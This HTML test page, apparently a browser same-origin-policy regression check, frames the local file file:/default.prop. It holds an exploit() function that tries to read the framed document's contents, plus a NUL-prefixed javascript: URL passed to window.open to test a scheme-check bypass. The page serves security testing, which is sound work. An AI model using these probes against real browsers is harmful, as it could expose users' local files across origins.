<!--
  Same-origin-policy regression page. It frames a file: URL and offers two
  manual checks of whether script on this page can reach the framed document.
  In a browser that enforces origin isolation, neither button should ever
  display the framed file's content.
  NOTE(review): the page carries no advisory or affected-version reference;
  record which browser build this was written against before filing results.
-->
<!-- Check 1: direct DOM access to the frame, via exploit() in the script below. -->
<button onclick="exploit()">Read iframe</button>
<!--
  Check 2: window.open() targeted at the window named "test" (the iframe below).
  Inside the onclick handler the \u0000 is a JavaScript string escape, so the
  URL passed is a NUL character followed by a javascript: URL. The point under
  test is whether the browser's scheme and origin checks still recognise and
  refuse a javascript: navigation into another origin's frame when the string
  has that prefix. The same sequence in the button label is plain HTML text
  and is shown literally.
-->
<button onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')">Try \u0000</button>
<!--
  Target frame. name="test" is what the window.open() call above addresses.
  The src is a local file: URL; presumably a file that exists on the device
  under test (confirm). Many browsers refuse to load file: URLs from a page
  served over http(s), in which case the frame stays empty and an empty result
  from either check says nothing about origin enforcement.
-->
<iframe src="file:/default.prop" name="test" style='width:100%;height:200'></iframe>
<script>
// Same-origin-policy probe for the "Read iframe" button: walks from the first
// <iframe> on the page down to its body markup, reporting each step with alert().
// The steps are deliberately separate statements. The last alert shown before
// the catch fires identifies the property access the browser refused.
// Expected result when the framed document is a different origin from this
// page: one of the accesses throws and the catch block reports the error.
// Reaching the final "innerHTML:" alert with the framed file's content means
// origin isolation failed in the browser under test.
function exploit() {
// First iframe in document order; undefined if the page has none, in which
// case the first property access inside the try throws and is reported.
var iframe = document.getElementsByTagName('iframe')[0];
try{
alert("Try to read local file.");
// Obtaining the frame's window object is normally allowed across origins.
alert("contentWindow:"+iframe.contentWindow);
// Reading .document is typically where a cross-origin check rejects the access.
alert("document:"+iframe.contentWindow.document);
alert("body:"+iframe.contentWindow.document.body);
// NOTE(review): an empty string here may only mean the frame never loaded
// the file: URL (blank document); confirm the frame content before
// treating the result as a pass or a fail.
alert("innerHTML:"+iframe.contentWindow.document.body.innerHTML);
} catch(e) {
// Show the exception raised by the refused step (e.g. a security error).
alert(e);
}
}
</script>